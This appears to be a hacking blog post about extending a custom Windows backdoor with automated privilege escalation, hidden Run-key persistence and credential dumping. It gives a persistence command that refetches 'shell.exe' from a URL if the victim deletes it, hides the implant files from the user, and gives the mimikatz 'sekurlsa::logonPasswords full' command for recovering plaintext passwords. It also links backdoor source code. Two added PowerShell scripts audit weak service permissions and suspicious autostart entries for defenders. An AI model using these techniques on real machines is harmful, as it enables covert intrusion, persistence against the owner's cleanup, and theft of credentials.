This time we will implement a persistence feature for the Windows operating system, but more on that later. As for the last post, I felt it was somewhat incomplete, so we will start off in simple fashion, just to get back on track (it’s been a while), by writing a privilege escalation function, then move on to the persistence section, and to finish we’re also taking a look at how to dump clear-text passwords remotely. Let’s do this! 😉
It’s been a while since I last played with the code and although the last video accomplished what it set out to, I wasn’t too happy with it. The whole process took some time and became very repetitive to do over and over… now don’t get me wrong, doing things manually will always teach you the most because you get to see how it actually works. However, having an automated version does have its benefits, provided enough testing is done.
For this reason I decided to have a go at writing automated functions for both privilege escalation and persistence (specifically for Windows at this point; as I encounter more scenarios in which I need them for other operating systems, I will implement them as I go). I will apologize now for the lack of testing. I only had a Windows Vista and a Win7 box available while programming these functions, and my laptop’s VMs made it really laggy to deal with. However, I programmed it in a way that I believe should work with other versions (XP, Server, etc.) as well. I’d be happy if the reader(s) could test it in their environment and see how it fares.
With that said, the first code I wrote was a simple download function to get a file from a URL. This is useful because it is invoked inside other functions in case, let’s say, we need to download an exploit or whatnot. It can now be used with the following syntax:
Just replace the URL and make sure it’s a direct link to the file; it will then download the given file to the current directory. I don’t think redirected downloads will work, but then again, I haven’t tried. If you do try it, let me know and I’ll update here!
On my last post, I showed you guys a method of getting SYSTEM access by adding a service and starting it using BypassUAC. This is cool, but we can only do such a thing under an administrator account. So I also linked Travis’ post on weak service permissions and how this could be used to escalate privileges from a standard user account.
In a nutshell, this could happen for many reasons. A standard user could manually change the settings to allow write access (sometimes without even knowing he’s doing so). Also I’ve been told that some torrents require you to do such a thing when installing an application, which I thought was very suspicious. In any case, you can read the whole article to get a better perspective.
I went ahead and wrote a function that attempts both methods to escalate privileges. If it detects an administrator account, it uses the BypassUAC method. If it’s a standard account, then it will take a little longer and scan directories for write access… if it finds anything, it then reports back the directories with misconfigured / improper permissions. Just as explained in the post by Travis, all that needs to be done is to copy the backdoor’s *.exe file in place of the service’s original. Peep the video below. 😉
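The flip side of the scan described above is the audit an administrator runs to find and fix the same misconfiguration before anyone else does. The following is an added example, not code from this post or from Travis’ article: it enumerates every installed service, extracts the service binary from its (possibly quoted, possibly argument-bearing) command line, and reports any binary or parent folder whose ACL grants write-type rights to Everyone, Users, Authenticated Users or INTERACTIVE. It assumes PowerShell 3 or later on Windows and an elevated prompt; the principal list and the rights mask are my choices, and nothing is modified (remediation is a separate icacls / Set-Acl step).

```powershell
# Added example: audit service binaries for ACLs that let low-privilege
# principals replace them. Read-only; run from an elevated prompt.

# Principals that should never be able to write a service binary (assumed list).
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow replacing, altering or re-permissioning a file or folder.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # A service PathName may be quoted, may carry arguments, or may be an
    # unquoted path containing spaces; return only the executable part.
    if ($PathName -match '^\s*"([^"]+)"')      { return $Matches[1] }
    if ($PathName -match '(?i)^\s*(.+?\.exe)\b') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Test-WeakAcl {
    param([string]$Path)
    # Returns a description of the first weak Allow ACE found, or $null.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        if (($weakPrincipals -contains $id) -and
            (($ace.FileSystemRights -band $writeMask) -ne 0)) {
            return "$id has $($ace.FileSystemRights)"
        }
    }
    return $null
}

function Get-WeakServiceBinary {
    # Get-WmiObject is used rather than Get-CimInstance so this also runs on
    # Windows 7-era hosts once PowerShell 3 is installed.
    foreach ($svc in (Get-WmiObject -Class Win32_Service)) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        $dir       = Split-Path -Parent $exe
        $fileIssue = Test-WeakAcl $exe
        $dirIssue  = Test-WeakAcl $dir
        if ($fileIssue -or $dirIssue) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                Binary    = $exe
                BinaryAcl = $fileIssue
                FolderAcl = $dirIssue
            }
        }
    }
}

Get-WeakServiceBinary | Format-Table -AutoSize -Wrap
```

A finding where RunsAs is LocalSystem and StartMode is Auto is the worst case, because the replaced binary runs as SYSTEM on the next boot or restart; fixing it means removing the offending ACE (or the whole inherited grant on the folder) rather than just hiding the binary.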
The persistence’s Visual Basic Script was based on the same one I used for “Automated Persistence on Metasploit” which if I’m not mistaken came from OMGSecurity, so credits go out to them. However, I completely modified it to do a few extra things:
- Check for the existence of the executable before executing it. Otherwise an error would be raised, which would most likely tip the client off that something’s up. The code implemented was found on Stack Overflow.
- Added a function to download a file, also found on Stack Overflow. Note that this only happens when the original executable has been deleted.
- Added code to check the attributes of both the executable and the VBScript itself and see if the files are visible. If they are, change the attributes to hide them. This way the files will only be seen if the user has set the option to view hidden files, which is set to “No” by default.
- Last but not least, modified the file some more to just sleep instead of raising an error on some occasions.
That’s basically it for persistence, you should know that it can be run in two different modes: simple and redown. If you just execute persistence without any arguments, like so:
This is the common persistence mode: it simply adds a registry entry and checks if the process is running; if it isn’t, it then executes it again. It also keeps both files’ attributes set to hidden. If the client finds the executable and deletes it, then it’s done: game over. Now on to the redown mode:
C:\Users\Administrator\Downloads> persist [http://url.com/shell.exe] [C:\Users\Administrator\Pictures\ImgDriver.exe]
In this case, you can see we specify two arguments: a URL that links to the file, and a new location. So if the administrator finds the executable inside the Downloads folder and deletes it, then the VBScript will redownload it from the link specified straight to the new location, which is C:\Users\Administrator\Pictures\ with the filename “ImgDriver.exe”. If you notice this has happened, you can run the persistence again and specify a new directory. You can see how this becomes a really “annoying persistence”. LOL
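Everything the two persistence modes above rely on (a Run-key entry, a script host, a hidden executable and a hidden VBScript living under a user profile) is visible to the person cleaning the machine, provided they look in the right places with hidden files included. The following is an added example written from that side, not code from this post: it walks the HKCU/HKLM Run and RunOnce keys and both Startup folders, and flags entries that invoke wscript/cscript or a .vbs, whose target carries the Hidden attribute, whose target sits under a user profile rather than a program directory, or whose target no longer exists on disk (the state the “redown” mode is designed to recover from). It assumes PowerShell 3 or later; the heuristics and their wording are mine and are meant for review, not automatic removal.

```powershell
# Added example: sweep the autostart locations used by Run-key persistence and
# report entries worth a second look. Read-only.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Parent of the current profile, e.g. C:\Users (C:\Documents and Settings on XP).
$profileRoot = Split-Path -Parent $env:USERPROFILE

function Get-TargetPath {
    param([string]$Command)
    # First path-like token of a Run value, quoted or not; when a script host
    # is named, prefer the script argument so the .vbs itself gets inspected.
    if ($Command -match '(?i)"([^"]+\.vbs)"|(?i)(\S+\.vbs)\b') {
        if ($Matches[1]) { return $Matches[1] } else { return $Matches[2] }
    }
    if ($Command -match '"([^"]+)"') { return $Matches[1] }
    return ($Command -split '\s+')[0]
}

function Get-AutostartFinding {
    param([string]$Source, [string]$Name, [string]$Command)
    $reasons = @()
    if ($Command -match '(?i)\b(wscript|cscript)(\.exe)?\b|(?i)\.vbs\b') {
        $reasons += 'launches a script host / VBScript'
    }
    $target = [Environment]::ExpandEnvironmentVariables((Get-TargetPath $Command))
    if (Test-Path -LiteralPath $target) {
        $item = Get-Item -LiteralPath $target -Force   # -Force: see hidden files too
        if (($item.Attributes -band [IO.FileAttributes]::Hidden) -ne 0) {
            $reasons += 'target file is marked Hidden'
        }
        if ($target -like "$profileRoot\*") {
            $reasons += 'target lives under a user profile'
        }
    } else {
        $reasons += 'target path does not exist on disk'
    }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{
        Source  = $Source
        Name    = $Name
        Command = $Command
        Reasons = ($reasons -join '; ')
    }
}

function Get-SuspiciousAutostart {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            # Skip the provider metadata (PSPath, PSParentPath, ...) that
            # Get-ItemProperty adds alongside the real values.
            if ($p.Name -like 'PS*') { continue }
            $f = Get-AutostartFinding -Source $key -Name $p.Name -Command ([string]$p.Value)
            if ($f) { $f }
        }
    }
    # Startup folders: anything hidden or script-based there is worth a look.
    foreach ($dir in @([Environment]::GetFolderPath('Startup'),
                       [Environment]::GetFolderPath('CommonStartup'))) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -Force |
            Where-Object { -not $_.PSIsContainer } |
            ForEach-Object {
                $f = Get-AutostartFinding -Source $dir -Name $_.Name -Command ('"' + $_.FullName + '"')
                if ($f) { $f }
            }
    }
}

Get-SuspiciousAutostart | Format-Table -AutoSize -Wrap
```

A legitimate updater can trip the “user profile” rule, so treat each line as a lead: the combination of a script host, a Hidden target and a profile path is the pattern described in this post, and a Run entry whose target is already gone is the one that would be quietly redownloaded on the next run.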
Plain Text Passwords
We’ve covered privilege escalation and persistence; now, to wrap this up, we’re gonna check out how to use Mimikatz to dump plain-text passwords from the client. Head over to the website and download the *.zip file (awesome work from Gentil Kiwi!). This tool is very easy to use: no installation, just extract the correct version that matches the client PC’s architecture. In my case, x64.
Unfortunately for me, my French skills are pretty bad, so I could get little out of the main page, or even the help screen of the application. I turned to Google to see if anybody had reviewed it in English and voilà! Found two links, one from Pentest Monkey and another from room362, big thanks to both! They helped clear up how to properly use it from the command line.
It’s simply a matter of uploading all of the files inside the correct folder to the client and executing it:
C:\Users\Administrator\Downloads> mimikatz.exe "sekurlsa::logonPasswords full" exit
Since my shell was already escalated to authority\system (the service starts as SYSTEM by default) and I had logged in as a standard user, it simply displayed that user’s credentials in plain text… saves the hassle of cracking the hashes.
[ UPDATE ]: Fortunately, the author of Mimikatz, Benjamin, emailed me and pointed out some finer points of his program. Not all files are needed to execute the program, just ‘mimikatz.exe’, and the correct syntax has been updated above.
Click here to download the server/client source code: [ DOWNLOAD ]
You can download mimikatz from the author’s website: [ Gentil Kiwi ]
Note: You MUST compile the client executable for testing in order for it to work.
That’s it for now, enjoy the video! 😉